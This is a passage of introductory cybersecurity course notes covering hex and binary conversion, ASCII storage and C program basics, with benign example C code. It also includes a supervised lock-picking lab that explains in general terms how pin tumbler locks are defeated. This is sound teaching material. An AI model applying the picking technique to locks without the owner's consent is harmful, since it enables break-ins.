• Concatenate the resulting four-bit binary numbers together.
For example, to convert the hexadecimal number 4DA9 to binary, we first convert each hexadecimal digit to a four-bit string:
4 = 0100
D = 1101
A = 1010
9 = 1001
and then concatenate the results: The resulting binary number is: 0100 1101 1010 1001. We can drop leading zeros
(from the leftmost quartet only!), giving us:
4DA9 = 100110110101001
Practice Problem 1.5
Convert the number 0x13F to binary.
Solution:
2.7. Converting a Binary Number to a Hexadecimal Number. Converting from binary to hexadecimal entails reversing the
procedure for converting from hexadecimal to binary. Specifically, we can convert from binary notation to the equivalent
hexadecimal representation by using the following procedure:
• Starting at the right, collect the bits into groups of 4.
• Convert each group of 4 bits into the equivalent hexadecimal digit.
• Concatenate the resulting hexadecimal digits.
For example, to convert 110110101001 to hexadecimal, we collect the bits into groups of 4 starting at the right: 1101
1010 1001, and then we convert each collection of bits into a hexadecimal digit:
    1101 → D
    1010 → A
    1001 → 9
Thus 110110101001 = DA9.
Practice Problem 1.6
Convert the binary number 110101001 to hexadecimal.
Solution:
Practice Problem 1.7
Suppose the first byte of a variable is stored at memory location numbered:
0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 1 1 1 1 1 1 1 1 0 1 1 1 1 1 0 0
We say that this memory location is the address of the variable. What is this variable’s address in hexadecimal notation?
Solution:
Again, the hexadecimal number system simply provides us with a more convenient means of conveying binary quantities.
Consider the preceding example: Instead of saying “The item is at address 00000000000100101111111101111100”,
we can say “The item is at address 0012FF7C.” In fact, for this course memory locations will always be 32-bit values
represented in hexadecimal.
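The C program below is an added example, not part of the original notes, that carries out the conversions of Sections 2.1
through 2.7 the way the notes do by hand. It goes a little beyond the text: the “largest power of the base, count, subtract,
repeat” method of Sections 2.2 and 2.5 is written once for any base from 2 to 16 (the notes show it for 2 and 16 only), the
result can be padded with leading zeros to a fixed width such as the 8 hex digits of a 32-bit address, and bad digits or values
that will not fit in 32 bits are rejected, a check the hand method never needs but a program must make. The function names
(from_base, to_base, hex_to_bin, bin_to_hex) are ours.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
/* The 16 digit symbols of Section 2.3; bases 2 and 10 use a prefix of them. */
static const char DIGITS[] = "0123456789ABCDEF";
/* Value of one digit symbol (0-9, A-F, a-f), or -1 if it is not a digit. */
static int digit_value(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}
/* Sections 2.1 and 2.4: weight each digit by the power of the base for its
   position. Returns -1 if a digit is not valid in this base or the value
   does not fit in 32 bits, checks the hand method never needs. */
int64_t from_base(const char *s, int base) {
    uint64_t acc = 0;
    if (base < 2 || base > 16 || *s == '\0') return -1;
    for (; *s; s++) {
        int d = digit_value(*s);
        if (d < 0 || d >= base) return -1;
        acc = acc * (uint64_t)base + (uint64_t)d;  /* shift one position left, add digit */
        if (acc > UINT32_MAX) return -1;
    }
    return (int64_t)acc;
}

/* Sections 2.2 and 2.5 for any base 2..16: find the largest power of the base
   that is <= x, count how many times it fits, subtract, and repeat with the
   remainder one position to the right. A position the remainder never reaches
   gets a 0. Leading zeros pad the result to 'width' digits (8 for a 32-bit
   address). Returns a static buffer that the next call overwrites. */
const char *to_base(uint32_t x, int base, int width) {
    static char out[33];
    char digits[33];
    int n = 0, pad;
    uint64_t p = 1;
    if (base < 2 || base > 16 || width > 32) return NULL;
    while (p * (uint64_t)base <= x) p *= (uint64_t)base;  /* Step 1 */
    for (;;) {
        int count = (int)(x / p);            /* digit for this position */
        digits[n++] = DIGITS[count];
        x -= (uint32_t)(count * p);          /* Step 2 */
        if (p == 1) break;                   /* Step 3: no positions left */
        p /= (uint64_t)base;
    }
    digits[n] = '\0';
    pad = width > n ? width - n : 0;
    memset(out, '0', (size_t)pad);
    strcpy(out + pad, digits);
    return out;
}

/* Section 2.6: each hex digit becomes exactly four bits; concatenate them.
   NULL on a non-hex digit or on more than 32 hex digits (128 bits). */
const char *hex_to_bin(const char *hex) {
    static const char *nibble[16] = {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111",
                                     "1000", "1001", "1010", "1011", "1100", "1101", "1110", "1111"};
    static char out[129];
    size_t len = strlen(hex);
    if (len == 0 || len > 32) return NULL;
    out[0] = '\0';
    for (; *hex; hex++) {
        int d = digit_value(*hex);
        if (d < 0) return NULL;
        strcat(out, nibble[d]);
    }
    return out;
}

/* Section 2.7: group the bits in fours from the right (the leftmost group is
   padded with implied zeros) and map each group to one hex digit. */
const char *bin_to_hex(const char *bin) {
    static char out[33];
    size_t len = strlen(bin), o = 0;
    int value = 0, nbits = (int)((4 - len % 4) % 4);
    if (len == 0 || len > 128) return NULL;
    for (size_t i = 0; i < len; i++) {
        if (bin[i] != '0' && bin[i] != '1') return NULL;
        value = value * 2 + (bin[i] - '0');
        if (++nbits == 4) { out[o++] = DIGITS[value]; value = 0; nbits = 0; }
    }
    out[o] = '\0';
    return out;
}

int main(void) {
    printf("1101 (base 2) = %lld\n", (long long)from_base("1101", 2));
    printf("1A9B (base 16) = %lld\n", (long long)from_base("1A9B", 16));
    printf("5 (base 10) = %s (base 2)\n", to_base(5, 2, 0));
    printf("746 (base 10) = 0x%s\n", to_base(746, 16, 0));
    printf("0x4DA9 = %s (base 2)\n", hex_to_bin("4DA9"));
    printf("110110101001 (base 2) = 0x%s\n", bin_to_hex("110110101001"));
    printf("32-bit address 00000000000100101111111101111100 = 0x%s\n",
           to_base((uint32_t)from_base("00000000000100101111111101111100", 2), 16, 8));
    return 0;
}
```

Compile and run it on the Linux machines used in this course with gcc -std=c99 -Wall base.c -o base && ./base. Because
to_base and the two hex routines return a static buffer, never pass two of their results to the same printf call.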
Practice Problem 1.8
Memory addresses are 32-bit values represented in hexadecimal.
(a) How many bytes are in a memory address?
(b) How many words are in a memory address?
(c) How many hexadecimal digits are in a memory address?
Solution:
So, now you should be comfortable going back and forth between binary, decimal and hex representations.
Remember: for any number, the representation in a given base can be determined by looking at the weights assigned to the
position of each digit in the number. The number 111 is equal to one hundred eleven if it is intended to be a base 10 number.
This same number—111—is equivalent to the base-10 value of seven if it is intended to be a binary number. This same
number—111—is equivalent to the base-10 value of two hundred seventy three if it is intended to be a hexadecimal number.
Practice Problem 1.9
The picture below shows nine consecutive memory locations in RAM. The address of the first location shown is 0x08048374
and locations are numbered sequentially. The values stored at each address are also shown in hexadecimal. For example,
memory address 0x08048374 holds the value 0x55.
(a) Fill in the memory addresses for the last four locations.
(b) How many bytes are stored at each individual memory address?
Solution:
(a)
(b)
3. Representation of Characters
Within a computer, positive integers are stored in four bytes by converting the integer to a binary number.² We now address
the representation of characters, such as letters of the alphabet, punctuation signs and other assorted symbols (e.g., $, %, etc.).
Characters are stored within the computer using the American Standard Code for Information Interchange code—the ASCII
code—shown in the table below.
Each ASCII symbol is shown with both its hexadecimal representation and its base-10 representation. Suppose we wanted to
know how the symbol for the question mark is stored internally within the computer. Scanning the table for the question mark,
we locate it at the bottom of the second column, and we note that its hexadecimal value is 3F. Converting this hexadecimal
value to binary, we conclude that the question mark is stored as 00111111.
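The C program below is an added example, not part of the original notes. It shows, on a real machine, the two ideas of this
section and of Section 1.4: a character occupies one byte holding its ASCII code, a positive integer occupies four bytes with its
leftmost bit 0, and an item that needs several bytes is addressed by its first byte. It prints the address, hex value and eight bits
of every byte of an int, a char and a short string. The W/X/Y/Z layout starting at address 20 with sizes 1, 2, 3 and 2 is our
assumption (the notes give only the addresses 23 and 26 for Y and Z). One detail the notes do not cover: on the x86 machines
in the lab the low-order byte of the integer is stored at the lowest address (little-endian), so 1234 = 0x000004D2 appears in
memory as D2 04 00 00; other processors store the bytes in the opposite order.

```c
#include <stdio.h>
#include <stdint.h>

/* Byte i (i = 0 is the lowest address) of any object in memory, as 0..255. */
unsigned byte_at(const void *obj, size_t i) {
    const unsigned char *p = obj;
    return p[i];
}

/* The ASCII code under which a character is stored in its single byte. */
unsigned ascii_code(char c) { return (unsigned char)c; }

/* Leftmost (most significant) bit of a 4-byte integer: 0 for a non-negative
   value, 1 for a negative one (footnote 2 covers the positive case). */
unsigned sign_bit(int32_t v) { return ((uint32_t)v >> 31) & 1u; }

/* Section 1.4's picture with assumed sizes: W (1 byte) at address 20, then
   X (2 bytes), Y (3 bytes) and Z (2 bytes) stored consecutively. The notes
   give only Y = 23 and Z = 26; the sizes of W and X are our assumption. */
#define FIRST_ADDRESS 20u
static const unsigned WXYZ_SIZES[4] = {1, 2, 3, 2};

/* Address of item k (0 = W ... 3 = Z): the address of its first byte, which is
   the first address plus the sizes of every item stored before it. */
unsigned wxyz_address(int k) {
    unsigned addr = FIRST_ADDRESS;
    for (int i = 0; i < k && i < 4; i++) addr += WXYZ_SIZES[i];
    return addr;
}

/* Print every byte of an object: its address, hex value and 8-bit binary. */
static void dump(const char *label, const void *obj, size_t n) {
    const unsigned char *p = obj;
    printf("%s (%zu byte%s, address of the item = %p):\n", label, n, n == 1 ? "" : "s", (void *)p);
    for (size_t i = 0; i < n; i++) {
        printf("  %p  0x%02X  ", (void *)(p + i), p[i]);
        for (int b = 7; b >= 0; b--) putchar(((p[i] >> b) & 1) ? '1' : '0');
        putchar('\n');
    }
}

int main(void) {
    int32_t n = 1234;       /* a positive integer: four bytes, leftmost bit 0 */
    char q = '?';           /* ASCII 0x3F = 00111111 */
    char word[] = "EC310";  /* five characters plus a terminating 0x00 byte */
    dump("int32_t n = 1234", &n, sizeof n);   /* D2 04 00 00 on x86 (little-endian) */
    dump("char q = '?'", &q, sizeof q);
    dump("char word[] = \"EC310\"", word, sizeof word);
    printf("leftmost bit of n: %u\n", sign_bit(n));
    printf("item Y is at address %u, item Z at address %u\n", wxyz_address(2), wxyz_address(3));
    return 0;
}
```

The byte order is the one thing in the output that depends on the machine; the ASCII codes, the 0x00 that ends the string,
and the rule that consecutive items start where the previous one's bytes end are the same everywhere.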
Practice Problem 1.10
How is the letter t stored in memory?
Solution:
² The right-most 31 bits are used. The leftmost bit is set to zero (indicating a positive integer).
Practice Problem 1.11
Consider again the picture shown in practice problem 1.9. Suppose you know that a character is stored at memory location
0x08048374. What is stored at this memory location?
Solution:
Reading
Read Appendix 1, Basic Linux Commands.
Problems
Problem 1.
Why do computers use binary?
Problem 2.
Main memory is much faster than secondary memory. Why don't we use main memory for all of our memory
storage needs? In other words, why bother using secondary memory?
Problem 3.
Secondary memory is non-volatile while main memory is volatile. Since it is better to have data be
nonvolatile, why don't we use secondary memory for all of our memory storage needs?
Problem 4.
(a) When you first boot up your computer (no user programs running), where is the Microsoft PowerPoint program stored?
(b) Where are these instructions copied to in order for you to compose a presentation using Microsoft PowerPoint?
(c) Where is the Microsoft PowerPoint program stored after you turn off your computer?
Problem 5.
True or false: Running programs are stored in the CPU.
Problem 6.
You type up a document in MSWORD, give it a file name, save it to your ‘My Documents’ folder, and power
down your computer. Where is the file you created now stored?
Problem 7.
What important piece of software controls the computer's hardware and software resources?
Problem 8.
Consider a quantity of 9216 bits.
(a) How many bytes does this amount to?
(b) How many words does this amount to?
(c) How many KB does this amount to?
Problem 9.
Express the binary number 100000 as a decimal number.
Problem 10.
Convert the binary number 10101 to decimal.
Problem 11.
Express the binary number 01110101 as a decimal number.
Problem 12.
Express the binary number 00101110 as a decimal number.
Problem 13.
Convert the decimal number 78 to binary.
Problem 14.
Convert the decimal number 43 to binary.
Problem 15.
Convert the decimal number 223 to binary.
Problem 16.
Express the hexadecimal number 27 as a decimal number.
Problem 17.
Express the hexadecimal number BEE as a decimal number.
Problem 18.
Convert the hexadecimal number 100 to binary.
Problem 19.
Convert the hexadecimal number F1E to binary.
Problem 20.
Convert the binary number 101110011011 to hexadecimal.
Problem 21.
Suppose you are told that an item is at 32-bit address C356A20C. What is the value of the fourth bit in this
address, counting from the left?
Problem 22.
Item A requires four bytes of storage and is located at address 0x00000071. Item B requires four bytes of
storage and is located in memory right before (i.e., at a lower memory address than) Item A. Item C requires
2 bytes of memory and is located in memory right before item B. What is Item C's address?
Problem 23.
How is the letter k stored in memory in binary?
Problem 24.
How is the letter g stored in memory in hexadecimal notation?
Problem 25.
What is the hexadecimal number that results from the calculation: 0x138 + 0x6
Problem 26.
What is the hexadecimal number that results from the calculation: 0x683 + 0x251
Problem 27.
What is the hexadecimal number that results from the calculation: 0x2A6 + 0xE97
Problem 28.
Consider the picture of main memory (RAM) shown below. The address of the first item is 0x0804839C,
and addresses are numbered sequentially.
(a) Label the figure showing the addresses for the next eight memory locations.
(b) List the four preceding memory addresses.
(c) If the items stored in the first five memory locations are characters, what is stored in this portion of
memory?
Problem 29.
Consider the memory address 730₁₀. By hand calculation, express this memory address in hexadecimal
notation, using a number of hex digits appropriate for our 32-bit architecture.
Security Exercise 1
Part 1: Why Pick Locks in a Cyber Security Class?
Many hacking conferences, such as the annual DEFCON Conference, have a room set aside for attendees to practice lock
picking.
If you think about it, hacking is a lot like lock picking!
• Hacking a computer is like solving a puzzle. Picking a lock is like solving a puzzle.
• Hacking potentially involves breaking into an area that you are not supposed to have access to. Picking a lock potentially
involves breaking into an area that you are not supposed to have access to.
• Hacking a computer often involves exploiting a defect. Picking a lock often involves exploiting a defect.
• We don’t have to hack into a person’s computer to gain the desired outcome. We could, for instance, take the user hostage
at gunpoint and force them to surrender their password. But, by surreptitiously hacking in, we can gain the desired outcome
with the owner remaining unaware. Likewise, we don’t have to pick the lock to a person’s front door to gain the desired
outcome; we could, for instance, kick in their front door. But, by surreptitiously picking the lock, we can gain the desired
outcome with the owner remaining unaware.
• Learning to hack takes practice. You can’t learn hacking just from lecture; you have to get your hands dirty. Learning to
pick locks takes practice. You can’t learn to pick locks just from lecture; you have to get your hands dirty.
• By learning to hack you can see how hackers defeat computer security mechanisms, and this can lead you to design more
secure computer systems. By learning to pick a lock you can see how burglars defeat security mechanisms, and this can
lead you to design more secure locks.
If you decide to pursue lock picking as a hobby, note that some states do not even allow possession of lock picking tools. In
the states of Mississippi, Nevada, Ohio and Virginia, simple possession of lock picking tools is taken as prima facie evidence
that you intend to commit a crime. In every state, picking a lock without the lock-owner’s permission is a crime.
In some countries it is illegal to even possess lock picking tools of the type you will use in lab today. For example, merely
possessing lock picking tools in Japan carries a sentence of one year imprisonment. Likewise, in Australia and Poland, mere
possession of lock picking tools is punishable with arrest. Hungary goes so far as to classify lock picks as military weapons
and only the armed forces may possess them.
In this lab, you will work in teams of four midshipmen to pick mechanical door locks.
Part 2: The Pin Tumbler Lock
Let’s examine this figure from The MIT Guide to Lock Picking³:
[Figure: cross-section of a pin tumbler lock; the outer Hull and the inner Plug are labeled.]
³ Unless otherwise noted, all figures are from The MIT Guide to Lock Picking, Copyright 1991 by Theodore Tool. All rights
reserved. The author permits reproduction of the document on a non-profit basis provided that this copyright and distribution
notice is included. The information in The MIT Guide to Lock Picking is provided for educational purposes only.
This picture shows a pin tumbler lock with no key inserted. Note the primary components:
• The hull is stationary.
• The cylindrical plug can rotate when the correct key is inserted into the plug.
• The lock has pins. In the picture above, the lock has 5 pins. The pin closest to where the key goes in is labeled pin 1.
The pins are in holes that pass through both the hull and the plug. Each individual pin has three components:
• A key pin
• A driver pin
• A spring
The key pin and driver pin are distinct components, but they are forced tightly together by the spring. A protrusion on the plug
(not shown) prevents the spring from pushing the pins completely out of the plug.
Note that in the picture above (with no key inserted) the plug cannot rotate. The reason: The driver pins are protruding between
the plug and hull, preventing rotation.
The picture below more clearly shows the driver pin preventing rotation of the plug.
When a key is inserted, the key pushes the key pin up, which pushes the driver pin up (working against the spring). If the key
raises all the pins to precisely the point where the break between each key pin and driver pin is on the shear line, the plug will
be free to rotate. This scenario is shown below.
Thus, the intent is to prevent the plug from moving unless the proper key is inserted. The proper key will lift each key pin to
the point where the break between the key pin and driver pin lines up with the shear line between the plug and the hull.
So… you might be seeing what is involved in lock picking… you have to use a tool to lift pins up so that breaks between the
key pins and driver pins line up with the shear line between the plug and hull. And you might be wondering… How do we lift
all those pins at the same time?
The answer is: You don’t lift all the pins at the same time. You lift the pins one at a time!
To pick a lock, you provide a small amount of force to attempt to turn the plug. The plug won’t turn of course, but the hope is
that one of the drivers will be wedged between the plug and hull (with the other drivers still somewhat loose). In other words,
the hope is that one pin will bind.
Then, you use a pick to gently move this driver up to the point where the gap between this particular key pin and driver pin
lines up with the shear line between the plug and hull. At this point, the plug will rotate slightly, causing a different pin to be
the one that is wedged between the plug and hull.
So, to pick a lock, you:
• Apply a gentle force to turn the plug using a tension rod.
• Using a pick, try to determine which pin is binding.
• Gently and slowly push that pin up until you feel it reach the shear line. This will cause the plug to move slightly. We
say that this pin is now set, with the driver pin trapped in the hull above the shear line.
• Rinse and repeat.
A short video at the link below illustrates the idea (but keep in mind that the order that pins bind might not be as shown!):
http://www.youtube.com/watch?v=v9hhBJHfwJE
Note the critical flaw that makes lock picking possible: Due to limitations in manufacturing tolerances, only one pin at a time
will bind!
Part 3: Let’s Pick Locks
We will use a Southord Locksmith Progressive Lock Picking System to learn how to pick locks. The kit comes with five locks,
creatively given the numbers one through five.
Lock number one is an exact replica of the lock to your Instructor’s residence. The lock has a single pin. The second lock,
an exact replica of the lock to the EC310 Course Coordinator’s residence, has two pins. Therefore this lock is slightly more
difficult to pick than lock one. Lock three, with three pins, is a replica of the lock to the Department Chair’s residence. Lock
four (four pins) is a replica of the lock to the Dant’s residence and picking lock five (five pins) would mean you could gain
access to (gasp!) the Buchanan House.
Each kit comes with four different picks and one tension rod. It is recommended that you use just the “hook feeler pick” and
the tension rod:
[Figure: the Hook Feeler Pick and the Tension Rod from the kit.]
Your assignment: To complete this lab, you must show the ability to break into your Instructor’s residence and the EC310
Course Coordinator’s residence. To gain extra credit, you must break into the Department Chair’s residence. Show you
instructor or lab technician your successful picking of each lock.
__________
Lock 1
__________
Lock 2
__________
Lock 3 (Extra Credit)
We would give you extra credit if you were to break into the Dant’s residence or the Buchanan House, but we realize that this
far surpasses your meager abilities (hmm… sounds like a dare!).
Security Exercise 1 Answer Sheet
Have your instructor sign for picking Locks 1, 2 and 3 below.
__________
Lock 1
__________
Lock 2
__________
Lock 3 (Extra Credit)
Although it exceeds your meager abilities, for "completeness", we include signature blocks for Locks 4 and 5.
__________
Lock 4 (Mega Extra Credit)
__________
Lock 5 (Super-duper bonus points)
Chapter 2: C Programs
Objectives:
a) Explain the distinction between machine language, assembly language and programs written in a high-level language.
b) Demonstrate the ability to analyze simple C programs that perform keyboard input, screen output and simple arithmetic.
c) Demonstrate the ability to create, edit, compile and execute C programs in a Linux environment.
d) Explain how integers and characters are stored and encoded in memory.
1. Machine Languages and High Level Languages
1.1. Machine Language
Computers can only “understand” ones and zeroes. Everything is bits!
When introducing yourself, try this:
“Hey, there are 10 kinds of people in the world,
those that speak binary and those that don’t.
Which are you?”
Ha ha ha ha!!! Works every time!
But…it gets worse! In addition to only speaking in ones and zeroes, computers can only interpret very simple instructions that
have been “hardwired” as electronic circuits on the CPU chip. This set of simple hardwired instructions is termed the
“instruction set,” and is established by the CPU manufacturer.
Let’s examine something as simple as adding two integers together. Computers can add two integers together because there is
an electronic circuit that works as follows: if you place a value on each of the two inputs to the circuit, the sum of the two
values will be placed on the output of the circuit. You should accept that such a circuit is easy to build—some of your fellow
midshipmen build these circuits in their classes, depending on their major.
Let’s say we have this addition circuit sitting on a table in front of us. How do we get it to actually perform addition? Simply
yelling at the circuit: “ADD TWO NUMBERS!” will not work (though many have tried).
The solution, circa 1950: Run jumper cables! If we wanted to add an integer stored at a location (let’s call the location A) to a
second integer stored at another location (let’s call this second location B), we would have to run cables from A and B to the
first and second inputs of the addition circuit. If we wanted to store the resulting sum at location C, we would have to run a
jumper cable from the output of the addition circuit to location C.
From the dawn of computers (mid-1940’s) to the early 1950’s, programming a computer consisted of running frantically around
a room, connecting and disconnecting cables from various locations on the large (room-size) computer for each calculation that
had to be performed. This was arduous physical activity, and computer operation was very slow (but, on the bright side,
computer programmers tended to be physically fit).
Computers were slowed down by humans. The human operators might need five minutes to connect all the cables for a
calculation that the circuit—once wired up—would then accomplish in five microseconds. So, the critical question arose: How
can we “communicate” with the computer to instruct it to perform complex tasks while sitting at our desk?
Early Programmers Hard at Work on the ENIAC (US Army Research Lab)
The solution: The circuit for each instruction in the CPU’s instruction set (for example, our addition circuit) is associated with
a unique bit string that the CPU can interpret. For example, it may be the case that if this bit string is set to 00100011, our
addition circuit will be used. If this bit string is set to a different value, say 11001000, the circuit that does a different instruction
(perhaps the comparison circuit that determines if the first input is larger than the second input) will be invoked. Moreover, all
of the required bit strings (needed to do whatever it was we needed to do) were placed in the computer's main memory at the
outset. This stored set of instructions, a program, replaced the need for jumper cables.
So, to write a program, the programmer must determine which operations from the instruction set he wishes the CPU to carry
out, then determine the unique bit strings corresponding to these instructions. These instructions (i.e., this program) are then
placed in memory, and the CPU executes one instruction after another.
An example should clarify. Suppose we have again our two integers A and B and we want to calculate the sum as C = A + B.
Using instructions from the CPU’s instruction set, the program to accomplish this might look something like Program 1, shown
below on the left (with corresponding explanations shown on the right):
Program 1        What it means to the computer
00010000         load into the CPU the integer…
00000111         …which we are calling A.
00100011         Add to this…
00001111         …what we are calling B
00010001         Now place this result…
00000100         …in the place we are calling C.[4]
This program is written in machine language, the language that the computer can actually follow. Most early programs were
written this way. Since machine language is defined by the hardware (the CPU’s instruction set), machine language is machine-dependent.
1.2. Assembly Language (“Low Level Language”)
Machine language programming was tedious, time-consuming, prone
to error, cumbersome, and generally awful. Imagine having to write a program like Program 1 above just to add two integers.
But, machine language programs are the only kind of programs that the CPU can understand.
To make programming easier for humans, the machine instructions were replaced by “English-like” words, while decimal
numbers and symbols replaced strings of bits. The new languages, using English-like wording, were called assembly
languages. Using assembly language, if we wanted to perform, say, addition, then instead of using the code
00100011
which is the appropriate machine language code from our prior example, we would instead use the corresponding assembly
language instruction
ADD
[4] The experienced programmer would recognize that the quantities A, B, C and D would actually be register values or the addresses of the
variables. This simple example is not meant to be technically rigorous, and is certainly not intended to represent any actual machine
language standard.
Program 1 on the previous page might appear as Program 2 below, written in assembly language.
Program 2
LOAD A
ADD B
STORE C
Computers don’t understand assembly language; computers only understand machine language. So, before a computer can
execute an assembly language program, it must be converted to machine language. An assembler is the software that translates
an assembly language program into a machine language program.
Because of the nearly one-to-one correspondence between assembly language symbols and instructions in the instruction set,
assembly language programs execute very efficiently.
1.3. High Level Languages
Assembly language programming is still not enjoyable. For one thing, it takes time to write
programs in assembly language because simple tasks take many lines of code. There is generally one assembly language
symbol (e.g., “ADD”) for each instruction in the instruction set. Writing programs in assembly language is not fun, and if there
is anything that electrical engineering is about, it’s having fun.
High-level languages were developed to allow programmers to write programs that are closer to natural English. In a high
level language, Program 1 on the prior page might simply be
Program 3
C = A + B
A single high-level language statement is usually equivalent to many, many instructions in the CPU instruction set (and
therefore also equivalent to many, many assembly language instructions). A program written in a high-level language is called
a source program (or source code).
Again, since computers only understand machine language, a program written in a high-level language must be translated into
machine language. A compiler is the software that translates high-level language into machine language.
High-level language program  →  Compiler  →  Machine language program
All compilers convert high-level language programs to machine language programs, but, in addition, some compilers will
also provide a listing of the assembly language code that corresponds to the machine language. This often proves very
useful, as we shall see.
1.4. Program Development
In this course you will gain some familiarity with the C high-level language. C works at a
lower level (“closer” to the hardware) than do other languages, such as Java. With C, we can gain a finer control over what
the computer is actually doing.
The C language is approximately four decades old. In 1970, at AT&T’s Bell Labs, engineers Ken Thompson and Dennis
Ritchie wanted to write an operating system to support a computer game they had written (Space Travel). They wanted to
write the operating system in a high-level language (prior to this, operating systems were written in assembly language.)
Finding no high-level languages satisfactory, they started with an existing language named BCPL as a base, and designed a
new language, subsequently named B. The language was further improved and renamed C. This is the C language we have
today. Having developed the C programming language, they returned to their task of writing an operating system in C. This
operating system was UNIX.
So, yes, the love that computer engineers have for video games led to the development of the C language and the UNIX
operating system. Here is a screenshot from the game Space Travel, to give you an idea of what computer geeks were salivating
over back in 1970:
Now that we have discussed machine language and high-level languages, it is worthwhile to briefly cover the mechanics of
using the C high-level language. You will enter your program by typing your C source code using a text editor (which—from
a text entry point of view—you should find similar to using a program such as Notepad). As previously mentioned, you will
then send your program to a compiler, which will translate your program into the machine language that the computer can
understand. You will then “run” (i.e., execute) your program.
So…we have three basic steps: Edit, Compile, Execute.
Your brains and hands  →  Editor (used to type in the program)  →  C program  →  Compiler  →  Machine language program (FINAL EXECUTABLE PROGRAM)
It should be emphasized once again: It is only the machine language program that is actually executed on the computer.
2. The Basics of C
Why learn to program in C? Who uses C programs? You do! Here are some programs written in C (and its child, C++):
• MSWORD
• Acrobat Reader
• PowerPoint
• Firefox
• All Windows operating systems
• Most games
In fact, despite what those CS kids might tell you, most programmers today are programming in C! The chart below shows the
relative popularity of programming languages over the years. C and Java have been battling for the title of "#1 Programming
Language" over the past years; C was the top language in 2013 and 2014; Java won the title (barely) in early 2015.
From TIOBE: The TIOBE Programming Community index is an indicator of the popularity of programming languages. The ratings
are based on the number of skilled engineers world-wide, courses and third party vendors.
It is quite fair for the busy midshipman to ask: "Why do I have to have basic familiarity with C programs?" The answer: The
only way you can truly gain an appreciation for the damage that computer programs can do to your host computer is to learn a
little computer programming. And since most programs are written in C (or its child C++), that’s a logical choice for us to
pursue. To quote your textbook author: “An understanding of programming is a prerequisite to understanding how programs
can be exploited.”
2.1. Program Layout
Simple C programs have the following layout:
#include<stdio.h>
int main( )            <-- A complicated way of saying: "This is the start of the program."
{
our simple program
}                      <-- The closing brace says: “This is the end of the program.”
Our simple program will consist of two parts:
• We first tell the computer the names of the variables we are going to use and the type of information they will
hold. This part of the program is called the variable declarations. As we’ll see, we have to tell the C compiler
about all the variables we intend to use in our program.
• The second part tells the computer to do something with our variables. These individual instructions are called
statements.
So, our program layout can be further refined:
#include <stdio.h>
int main( )
{
variable declarations
statement 1;
statement 2;
(etc., etc.)
statement n;
}
Spacing. We can use our own choice for line spacing and indentation. Specifically, we can have multiple blank lines between
statements, we can indent each line as much as we like, we can place any amount of space between different words, etc. As a
general rule, you should use line spacing and indentation to make programs easy to read. To enhance readability, place each
statement on its own line (unless it won’t fit).
The Semi-colon. Each statement is an instruction which is followed by the computer. Each executable statement is ended
with a semi-colon. Put another way, a semi-colon marks the end of an executable statement.
Syntax. The syntax of C is the set of rules for constructing correct statements. That is to say, the grammar rules of the
programming language are referred to as the syntax. For example, ending each statement with a semi-colon is a grammar
rule—part of the syntax. If we violate a grammar rule, it is said that we have made a syntax error. For example, if we don't
include a semi-colon where necessary, or if we leave off a program’s closing brace, we have made a syntax error. The compiler
will detect syntax errors.
Comments. We can insert comments into programs in order to help other people (and ourselves!) understand the program.
Comments are ignored by the compiler. No machine language is generated by comments. To insert a comment, use two
consecutive slashes ( // ) with no space between them. The comment will begin immediately following the two slashes and
run to the end of that line. Consider this example:
#include <stdio.h>
int main( )
{
int length = 6, width = 5, height = 2;
//Look at me!
// Random comment, just thrown in to show you a comment.
}
2.2. Variables
A variable is a location in computer memory where data can be stored; that is, a variable holds data, for
instance a number or a character. The data held in a variable is called its value.
Identifiers. We give each variable a name. We can imagine that the memory location for our variable is actually labeled with
the variable’s name. For example, if we have a variable named age that holds the value 50, we can "imagine" that in main
memory my variable is held in a box labeled "age":
      age
    +------+
    |  50  |
    +------+
Of course, in actuality, my variable is stored at a specific memory address (and is stored in binary).
The programmer is free to choose the names of his variables subject to only a few constraints: A variable name must start with
a letter. All other characters in the variable’s name must be letters, numbers or the underscore symbol. So, m171234 could
be chosen as a variable name, but 171234 or m-171234 could not be variable names (in the first case, the faulty name starts
with a number, in the second case the faulty name has a hyphen as one of its characters).
Variable Declarations. Every variable must be declared before it can be used. When you declare a variable, you tell the
computer the variable’s name (i.e., its identifier), and what kind of data you are storing in the variable. The compiler reserves
a location in memory to hold the variable’s value.
The kind of data that a variable holds is called the variable’s type. More on this in a moment, but, first, the syntax of a variable
declaration is:
type variable_name_1, variable_name_2, ... , variable_name_x ;
Note that when you declare more than one variable of the same type in a declaration, a comma is used to separate the variable
names. Also notice that a variable declaration ends with a semicolon.
Variable Types. When you declare a variable, you must tell the computer the variable's type, i.e., the kind of data the variable
will be holding. For now, our choices for type are:
Kind of data                           type     Amount of space reserved to hold the variable
Integer (e.g., 1, -5, 39)              int      stored in 4 bytes
Real Numbers (e.g., 2.35, -9.9)        float    stored in 4 bytes
A single character (e.g., A, $, b)     char     stored in 1 byte
Notice that integers are always stored as four bytes. So, for example, the integer value 2 is represented in binary as 10 and
would be stored as the four-byte quantity:
00000000
00000000
00000000
00000010
Examples of Declarations. If we wanted to declare a variable that would hold someone's age as an integer, we would use
int someone_age;
If we wanted to declare two variables that would store a midshipman's status as a single character (e.g., P for Plebe, Y for
Youngster, S for Sleeper, F for Firstie), we would use
char mid1, mid2 ;
Why do we need to declare variables? Consider the following series of 1’s and 0’s stored in memory: 01000001. This
set of 1’s and 0’s can be
• The character A in ASCII
• the integer 65 (under the presumption that the three preceding bytes are all zeros since integers use four bytes)
• some real number
Which is it? There is no way of knowing, unless we tell the compiler up-front the type of data the variable is intended to hold.
If we tell the compiler the aforementioned value (01000001) is the value of variable of type char, the compiler will interpret
the value as the character A. If, on the other hand, we specify that this is the value of a variable of type int, the compiler will
interpret the value as the integer 65. By declaring a variable we tell the computer how much memory to use for the variable
and what code to use when converting the variable’s value to and from a binary string.
2.3 Data Representation.
Positive integers are stored in four bytes by converting the integer to a binary number. The rightmost 31 bits are used. The
leftmost bit is set to zero (indicating a positive number).
We will not be concerned with negative integers in this course, but you should be aware that they are also stored in four bytes
and the left-most bit will be a one.
Variables of type char are stored in one byte using the ASCII code. The ASCII table from the previous chapter is repeated below.
